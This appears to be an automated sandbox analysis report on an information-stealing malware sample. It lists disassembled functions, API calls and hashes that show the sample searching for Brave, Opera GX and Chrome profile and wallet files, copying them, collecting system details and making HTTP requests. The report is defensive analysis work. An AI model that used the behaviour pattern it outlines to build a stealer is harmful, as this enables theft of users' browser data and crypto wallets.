                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1325 934d08-934daf call 94e520 wsprintfA FindFirstFileA call 943da0 * 2 1332 934db5-934dc9 StrCmpCA 1325->1332 1333 93516b-935181 call 921cde call 93d1a8 1325->1333 1334 935138-93514d FindNextFileA 1332->1334 1335 934dcf-934de3 StrCmpCA 1332->1335 1339 93515f-935165 FindClose 1334->1339 1340 93514f-935151 1334->1340 1335->1334 1337 934de9-934e2b wsprintfA StrCmpCA 1335->1337 1341 934e4a-934e5c wsprintfA 1337->1341 1342 934e2d-934e48 wsprintfA 1337->1342 1339->1333 1340->1332 1344 934e5f-934e9c call 943da0 lstrcatA 1341->1344 1342->1344 1348 934ec2-934ec9 strtok_s 1344->1348 1349 934ecb-934f09 call 943da0 lstrcatA strtok_s 1348->1349 1350 934e9e-934eaf 1348->1350 1355 9350c9-9350cd 1349->1355 1356 934f0f-934f1f PathMatchSpecA 1349->1356 1354 934eb5-934ec1 1350->1354 1350->1355 1354->1348 1355->1334 1359 9350cf-9350d5 1355->1359 1357 934f25-934ffe call 9304bc call 931c1f call 9305de call 93059c call 9305de call 93059c call 930562 call 922920 * 5 DeleteFileA CopyFileA call 93213b call 94f150 1356->1357 1358 935019-93502e strtok_s 1356->1358 1395 935000-935014 DeleteFileA call 922920 1357->1395 1396 935039-935045 1357->1396 1358->1356 1361 935034 1358->1361 1359->1339 1362 9350db-9350e9 1359->1362 1361->1355 1362->1334 1364 9350eb-93512d call 921cfd call 934d08 1362->1364 1372 935132 1364->1372 1372->1334 1395->1358 1397 935156-93515d call 922920 1396->1397 1398 93504b-935071 call 9304ee call 927fac 1396->1398 1397->1333 1407 935073-9350b7 call 921cfd call 9304bc call 937023 call 922920 1398->1407 1408 9350bd-9350c4 call 922920 1398->1408 1407->1408 1408->1355
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00934D5C
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00934D73
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00934D8F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00934DA0
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956A00), ref: 00934DC1
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00956A04), ref: 00934DDB
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00934E02
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0095660F), ref: 00934E16
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00934E3F
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00934E56
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00934E68
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00934E7D
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00934EC2
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00934ED4
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00934EE9
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00934F02
                                                                                                                                                                                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00934F17
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00956A30,0095661D), ref: 00934FD0
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00934FE0
                                                                                                                                                                                                                • Part of subcall function 0093213B: CreateFileA.KERNEL32(00934FEC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00934FEC,?), ref: 00932156
                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00934FF6
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00935001
                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 00935027
                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(?,?), ref: 00935145
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 00935165
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                              • API String ID: 956187361-332874205
                                                                                                                                                                                                              • Opcode ID: 627ca8532ee75c927a7b5933429b4071ec012e5990933af445dd2cf9b5e8e79d
                                                                                                                                                                                                              • Instruction ID: e402ea8ac629c45cc4f46ab21e33f4f387d0cc991dd2eec8d4844e7c0c406fb1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 627ca8532ee75c927a7b5933429b4071ec012e5990933af445dd2cf9b5e8e79d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 49C107B2D0022AABDF22EF60DC45AAE777CAF48304F4145A5FA09B3155DA35EB858F50
                                                                                                                                                                                                              Function 00929CF1 Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1631 929cf1-929daa call 9304bc call 93059c call 9305de call 930562 call 922920 * 2 call 9304bc * 2 FindFirstFileA 1648 929db0-929dc4 StrCmpCA 1631->1648 1649 92a75d-92a7ac call 922920 * 3 call 921cde call 922920 * 3 call 93d1a8 1631->1649 1650 92a736-92a74b FindNextFileA 1648->1650 1651 929dca-929dde StrCmpCA 1648->1651 1650->1648 1653 92a751-92a757 FindClose 1650->1653 1651->1650 1655 929de4-929e5a call 93051e call 93059c call 9305de * 2 call 930562 call 922920 * 3 1651->1655 1653->1649 1686 929f63-929fd7 call 9305de * 4 call 930562 call 922920 * 3 1655->1686 1687 929e60-929e76 StrCmpCA 1655->1687 1738 929fdd-929ff2 call 922920 StrCmpCA 1686->1738 1688 929e78-929ee8 call 9305de * 4 call 930562 call 922920 * 3 1687->1688 1689 929eed-929f61 call 9305de * 4 call 930562 call 922920 * 3 1687->1689 1688->1738 1689->1738 1741 92a1c4-92a1d9 StrCmpCA 1738->1741 1742 929ff8-92a00c StrCmpCA 1738->1742 1743 92a1db-92a21e call 921cfd call 9304ee * 3 call 928533 1741->1743 1744 92a22e-92a243 StrCmpCA 1741->1744 1742->1741 1745 92a012-92a148 call 9304bc call 931c1f call 9305de call 93059c call 9305de call 93059c call 930562 call 922920 * 5 CopyFileA call 9304bc call 9305de * 2 call 930562 call 922920 * 2 call 9304ee call 927fac 1742->1745 1802 92a223-92a229 1743->1802 1747 92a2a4-92a2be call 9304ee call 931d67 1744->1747 1748 92a245-92a256 StrCmpCA 1744->1748 1928 92a14a-92a188 call 921cfd call 9304ee call 937023 call 922920 1745->1928 1929 92a18d-92a1bf DeleteFileA call 922920 * 3 1745->1929 1773 92a2c0-92a2c4 1747->1773 1774 92a324-92a339 StrCmpCA 1747->1774 1751 92a6a5-92a6ac 1748->1751 1752 92a25c-92a260 1748->1752 1755 92a706-92a730 call 922920 * 2 1751->1755 1756 92a6ae-92a6fb call 921cfd call 9304ee * 2 call 9304bc call 929cf1 1751->1756 1752->1751 1758 92a266-92a2a2 call 921cfd call 9304ee * 2 1752->1758 1755->1650 1824 92a700 1756->1824 1807 92a30a-92a314 call 9304ee call 928853 1758->1807 1773->1751 1781 92a2ca-92a304 call 921cfd call 9304ee call 9304bc 1773->1781 1785 92a51b-92a530 StrCmpCA 1774->1785 1786 92a33f-92a3fb call 9304bc call 931c1f call 9305de call 93059c call 9305de call 93059c call 930562 call 922920 * 5 CopyFileA 1774->1786 1781->1807 1785->1751 1793 92a536-92a5f2 call 9304bc call 931c1f call 9305de call 93059c call 9305de call 93059c call 930562 call 922920 * 5 CopyFileA 1785->1793 1883 92a401-92a488 call 921cfd call 9304ee * 3 call 928dac call 921cfd call 9304ee * 3 call 92951a 1786->1883 1884 92a48e-92a49e StrCmpCA 1786->1884 1887 92a5f8-92a673 call 921cfd call 9304ee * 3 call 929043 call 921cfd call 9304ee * 3 call 929278 1793->1887 1888 92a679-92a68b DeleteFileA call 922920 1793->1888 1802->1751 1830 92a319-92a31f 1807->1830 1824->1755 1830->1751 1883->1884 1890 92a4a0-92a4eb call 921cfd call 9304ee * 3 call 9299e1 1884->1890 1891 92a4f1-92a503 DeleteFileA call 922920 1884->1891 1887->1888 1903 92a690-92a697 1888->1903 1890->1891 1902 92a508-92a516 1891->1902 1908 92a69e-92a6a0 call 922920 1902->1908 1903->1908 1908->1751 1928->1929 1929->1741
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,009567F2,009567EF,0095731C,009567EE,?,?,?), ref: 00929D9B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957320), ref: 00929DBC
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957324), ref: 00929DD6
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX,00957328,?,009567F3), ref: 00929E68
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Brave,00957348,0095734C,00957328,?,009567F3), ref: 00929FEA
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 0092A004
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092A0C4
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092A193
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092A1D1
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092A23B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(0092CCBE), ref: 0092A24E
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092A331
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092A3F1
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0092A496
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092A4F7
                                                                                                                                                                                                                • Part of subcall function 00928DAC: lstrlenA.KERNEL32(?), ref: 00928FA5
                                                                                                                                                                                                                • Part of subcall function 00928DAC: lstrlenA.KERNEL32(?), ref: 00928FC0
                                                                                                                                                                                                                • Part of subcall function 0092951A: lstrlenA.KERNEL32(?), ref: 00929943
                                                                                                                                                                                                                • Part of subcall function 0092951A: lstrlenA.KERNEL32(?), ref: 0092995E
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 0092A528
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092A5E8
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092A67F
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0092A743
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092A757
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                                                              • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                              • API String ID: 4173076446-1189830961
                                                                                                                                                                                                              • Opcode ID: e2720c3715fb9fd3396bec24d33a207a0924c79f85bee48e042a56e1224ade75
                                                                                                                                                                                                              • Instruction ID: 497958a6fab50c44d7b86c812d3a5f8df30efdde921abd535983ad70f6878ebc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e2720c3715fb9fd3396bec24d33a207a0924c79f85bee48e042a56e1224ade75
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 784205369401299BCF21FB25ED4ABDDB774AF88304F4101A1B948B7126DB35AFD98F81
                                                                                                                                                                                                              Function 00936013 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                              • API String ID: 2178766154-445461498
                                                                                                                                                                                                              • Opcode ID: 03086921538b9435eb80d2db73962ba723a2ca4eb4b805b6702969dddb4238b4
                                                                                                                                                                                                              • Instruction ID: a1b355cfdb26013576b398785dbcfb3b228306add4ed1aa01c2d1b7195aad0c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03086921538b9435eb80d2db73962ba723a2ca4eb4b805b6702969dddb4238b4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2481127190022DABCF61EB61DC4ABCD77B8BF48305F4185E5E589A3121DF31AA998F90
                                                                                                                                                                                                              Function 0093C603 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                                                              • API String ID: 0-1626504983
                                                                                                                                                                                                              • Opcode ID: 60c15f2c23d0b3bc97b6cf029dc6db954f7e9455ff97bcc470bf463dc22a9818
                                                                                                                                                                                                              • Instruction ID: b74291ed928c0460269d5089f15bf305abb3e2ae22927e4b58460ff4ae3c1290
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 60c15f2c23d0b3bc97b6cf029dc6db954f7e9455ff97bcc470bf463dc22a9818
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C027AB1D046688BDF21DF68CC817AEBBB9AF45304F0444EAD949BB242D7349E84CF95
                                                                                                                                                                                                              Function 00926963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 009269C5
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 009269DF
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926A0E
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00926A4D
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00926A7D
                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00926A88
                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00926AAC
                                                                                                                                                                                                              • InternetReadFile.WININET(?,?,000007CF,?), ref: 00926B40
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926B50
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926B5C
                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00926B68
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                              • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                              • API String ID: 3863758870-2509457195
                                                                                                                                                                                                              • Opcode ID: 2ffe511b19773154a9c4d9a5a97a5c97252cf4986b8d27c19fa7cd268ea9b24f
                                                                                                                                                                                                              • Instruction ID: 6d934871e32cf7055b346f31a2eb6663f7c89a272a6c1ff4f40b62e57deffb3f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ffe511b19773154a9c4d9a5a97a5c97252cf4986b8d27c19fa7cd268ea9b24f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2512C71900169AFDB21AF60EC85BAEB7BCFB44344F0081E5F549A7161DE309EC59F90
                                                                                                                                                                                                              Function 0093196C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00931973
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000030,00933FA7,?,AV: ,009568CC,Install Date: ,009568B8,00000000,Windows: ,009568A8,Work Dir: In memory,00956890), ref: 00931982
                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00931993
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00952F00,00000000,00000001,00952E30,?), ref: 009319AD
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009319E3
                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00931A32
                                                                                                                                                                                                                • Part of subcall function 00931D17: LocalAlloc.KERNEL32(00000040,00000005,?,?,00931A55,?), ref: 00931D1F
                                                                                                                                                                                                                • Part of subcall function 00931D17: CharToOemW.USER32(?,00000000), ref: 00931D2B
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00931A60
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
